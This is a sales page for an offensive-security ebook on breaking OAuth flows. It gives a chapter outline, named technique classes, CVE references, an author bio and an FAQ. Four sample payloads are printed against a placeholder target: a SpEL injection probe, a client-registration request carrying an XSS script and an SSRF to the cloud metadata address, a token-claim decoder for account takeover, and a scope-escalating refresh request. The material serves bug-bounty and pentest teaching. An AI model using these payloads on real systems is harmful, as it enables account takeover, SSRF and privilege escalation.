Broken Token Series — Book 2

13 Original Named Techniques — Not Found Anywhere Else*

BROKEN TOKEN: OAuth

Know every way to break an OAuth flow. Every technique, every payload, tested and ready. PKCE downgrade, DCR injection, token lifecycle abuse, grant flow weaponization — including original research not documented in any public resource.

$19 $29 SAVE $10

Get Your Copy

30-day money-back guarantee · PDF format · Instant download

COVER IMAGE

Taste the Content

REAL PAYLOADS. REAL TECHNIQUES.

Every technique comes with framework context, CVEs, and a ready-to-use command. No theory without payload.

Chapter 3 — Authorization Request

SpEL Injection via response_type — RCE

TARGET="https://target.com/oauth/authorize" PAYLOAD='%24%7B7*7%7D' # ${7*7} curl -s "$TARGET?response_type=$PAYLOAD\ &client_id=acme&scope=openid\ &redirect_uri=http://test" # "49" in response body → RCE confirmed

Chapter 6 — Redirect & Callback

DCR Metadata Injection — SSRF + XSS

curl -s -X POST https://target.com/connect/register \ -H 'Content-Type: application/json' \ -d '{ "redirect_uris":["https://app.com/cb"], "client_name":"<script>alert(1)</script>", "logo_uri":"http://169.254.169.254/latest/meta-data/" }'

Chapter 8 — Token & Claims

Mutable Identifier Pattern — account takeover

TOKEN="<id_token>" echo $TOKEN | cut -d. -f2 | python3 -c " import sys,base64,json; p=sys.stdin.read().strip() p+='='*(4-len(p)%4) d=json.loads(base64.b64decode(p)) [print(k,d[k]) for k in ['sub','email','hd'] if k in d]" # email mutable → change to victim's → account takeover

Chapter 9 — Token Lifecycle

Scope Creep at Refresh — privilege escalation

curl -s -X POST https://target.com/token \ -d "grant_type=refresh_token\ &refresh_token=$RT\ &client_id=app\ &scope=read write admin" # Decode new token — check scope claim

Table of Contents

ALL 10 CHAPTERS

Each chapter follows the same structure: framework behavior, CVEs, attack primitives, detection.

CH 01

Introduction

What OAuth is, why it breaks, token types, JWT bridge, Find/Forge/Fire methodology

2 pages

CH 02

OAuth Fundamentals

Roles, authorization request parameters, grant types, PKCE, state

3 pages

CH 03

Authorization Request

Authorization Endpoint Parameter Injection (SpEL/XSS) · Response Mode Escape · redirect_uri bypasses · Azure AD research

5 pages

CH 04

Client Identity & State

client_id Session Poisoning · Missing state · Static state (CVE-2023-31999) · Predictable state

4 pages

CH 05

PKCE

S256→plain Method Downgrade · Remove code_verifier · Remove code_challenge · Confidential client PKCE downgrade

4 pages

CH 06

Redirect & Callback

DCR Metadata Injection (SSRF + XSS/impersonation) · Resource Indicator Omission · Open redirect chaining

4 pages

CH 07

Token Exchange

Grant Type Substitution → MFA Bypass · Auth Method Confusion · Code Injection · Code Replay

5 pages

CH 08

Token & Claims

Mutable Identifier Pattern (nOAuth · Google domain takeover · Slack/Zoom hd claim) · Missing aud validation

3 pages

CH 09

Token Lifecycle

Scope Creep at Refresh · OAuth Singleton Race Condition

3 pages

CH 10

Grant Flow Abuse

prompt=none Silent Redirect · Device Code Phishing (Storm-2372 · TA2723 · EvilTokens) · Consent Phishing

4 pages

APX

Appendix — DIY Infrastructure

Discovery one-liners · PKCE generation · Device code polling · DCR payload · Token decode

3 pages

Coverage

EVERY ATTACK LAYER

From the authorization request to grant flow abuse — every layer where OAuth security breaks.

13 Original Named Techniques*

DCR Metadata Injection, Mutable Identifier Pattern, OAuth Singleton Race Condition, Response Mode Escape, Scope Creep at Refresh — named and documented here for the first time.

Authorization Layer

SpEL/XSS via OAuth parameters, response_mode escape chains, redirect_uri wildcard bypass, path traversal, Azure AD server-side bypass research. 10 CVEs documented.

PKCE & State

S256→plain downgrade, verifier and challenge omission bypasses, confidential client PKCE downgrade, missing/static/predictable state. CVE-2023-48228, CVE-2024-23647, CVE-2024-22258.

Dynamic Client Registration

SSRF via URI fields, XSS and brand impersonation via display fields. One endpoint, two attack surfaces. Second-order SSRF fires at consent screen render.

Token & Claims

Mutable identifier attacks across Azure AD, Google, Okta, GitHub. Per-provider mutability matrix — first published here. Missing aud validation (CVE-2025-9803).

Active Threat Intel

Device Code Phishing via Storm-2372, TA2723, EvilTokens PhaaS. prompt=none silent redirect confirmed in active campaigns (March 2026). Current, not historical.

Original Research

NAMED BY THIS BOOK*

Technique classes named, framed, and documented here for the first time.

Mutable Identifier Pattern

Trusting a mutable claim (email, hd) as a stable identity anchor. Covers nOAuth, Google domain takeover, Slack/Zoom hd claim.

OAuth Singleton Race Condition

Concurrent auth flows overwriting shared singleton state — identity swap. GHSA-9q5m-jfc4-wc92, GHSA-2cjm-2gwv-m892.

DCR Metadata Injection

Same /connect/register endpoint: URI fields → SSRF, display fields → XSS/impersonation. CVE-2026-22752, GHSA-pf93-j98v-25pv.

Response Mode Escape

Patch one response_mode, bypass via another. The Keycloak three-CVE chain (CVE-2023-6134 → 6291 → 6927) as one named class.

Scope Creep at Refresh

RFC 6749 §6 silence on broader scope enables privilege escalation at the refresh endpoint. CVE-2025-12110, CVE-2026-1035.

S256→plain Downgrade

Method evaluated per-request, not locked at registration. Applies to all RFC-compliant AS. No CVE — first named writeup.

Grant Type Substitution

MFA bound to browser flow only — alternate grant type bypasses it. CVE-2024-37893 (Firefly III). Keycloak and Auth0 primary targets.

Auth Method Confusion

Client registered with strong method, library silently falls back to weak. Spring Security #9780, MCP TypeScript SDK #951.

Resource Indicator Omission

Omit resource from token request → audience-unbound token. VS Code, IBM, MCP SDK confirmed. RFC 8707 mandatory in MCP spec.

client_id Session Poisoning

Concurrent requests with different client_id overwrite shared AS session state — code delivered to attacker redirect_uri.

prompt=none Silent Redirect

Error delivery to unregistered redirect_uri — open redirector in active phishing campaigns (March 2026). RFC 9700 §4.11.2.

Authorization Endpoint Parameter Injection

OAuth parameters reaching template engine without sanitization. SpEL → RCE (CVE-2016-4977). Pattern live in any framework using server-side templates for error pages.

PKCE Verifier Exposed as State

Developer passes code_verifier as OAuth state, exposing the PKCE secret in the front-channel URL. GHSA-6g25-pc82-vfwp.

* Original as of publication date — first named writeup, first unified framing, or first per-provider matrix for each technique.

Series

EXPAND YOUR ARSENAL

Four independent books. Each covers a distinct token type and attack surface. No reading order required.

BOOK 01

JWT

Algorithm attacks, key injection, claim manipulation, format attacks.

Available now →

BOOK 02

OAuth

redirect_uri bypass, PKCE downgrade, token lifecycle abuse, grant flow weaponization.

Available now

BOOK 03

OIDC

iss injection, nonce bypass, mix-up attacks, UserInfo manipulation.

Coming soon

BOOK 04

SAML

XML signature wrapping, XXE, parser differential attacks, SSO bypass.

Coming soon

Author

BRUTE LOGIC

Rodolfo Assis

@BRuteLogic

15+ Years 1,461 Reports KNOXSS Creator Brute One BSides Boston 2016 DEF CON 25 Ekoparty 2025 Top 200 Influencer 2021 5 Ebooks 64K+ Followers

Brazilian offensive security researcher with 15+ years breaking web applications. Creator of KNOXSS — the most comprehensive automated XSS service, live since 2016 — and X55.is, a universal XSS delivery domain. Founder of Brute One, an AI assistant for bug bounty hunting with tool execution capabilities and proprietary offensive knowledge.

Author of the following offensive security ebooks: First Bounty, The Brute Art of Bypass, SSRF Mastery Series — Fundamentals, Broken Token: JWT, and now Broken Token: OAuth. Writing Security in Collapse, a cyberpunk doctrine for the Intelligence Age. Building the King of Noobs recon suite on GitHub — reKover, unKover, disKover.

Spoke at BSides Boston 2016, DEF CON 25, and Ekoparty 2025. Ranked #1 globally on Open Bug Bounty in 2015 with 1,461 reports. 1,000+ vulnerabilities disclosed against Oracle, Apple, Microsoft, Samsung, Slack, Uber, LinkedIn and others. Listed among 200 Global Cybersecurity Influencers by Check Point (2021). 64K+ followers @BRuteLogic.

FAQ

QUESTIONS

Who is this for?

Intermediate to advanced bug bounty hunters and pentesters who already know what OAuth is and want to know every way to break it. Not a beginner guide.

How is this different from what's already out there?

No dedicated offensive OAuth ebook exists at this depth. Existing resources are either one-page cheat sheets with no PoCs or guided lab environments covering surface-level techniques. This book documents 13 original named technique classes, maps each to a structural root cause, covers 22 CVEs across 6 frameworks, and gives you copy-paste bash commands for every technique.

Do the commands actually work?

Yes. Every command was tested on Ubuntu 24 before inclusion. No placeholder code, no theoretical payloads.

Do I need to read the JWT ebook first?

No. Each book in the Broken Token series is independent. If the access token at your target is a JWT (JSON Web Token), the Broken Token: JWT ebook's techniques apply directly on top — but this book stands alone.

What frameworks are covered?

Keycloak, Spring Authorization Server, Auth0, authentik, Hydra (Ory), node-oauth2-server, @fastify/oauth2, and MCP ecosystem implementations. Per-framework behavior tables in every attack chapter.

BROKEN TOKEN: OAuth

REAL PAYLOADS. REAL TECHNIQUES.

ALL 10 CHAPTERS

EVERY ATTACK LAYER

NAMED BY THIS BOOK*

EXPAND YOUR ARSENAL

QUESTIONS

STOP FINDING THE SAME BUGS EVERYONE ELSE FINDS.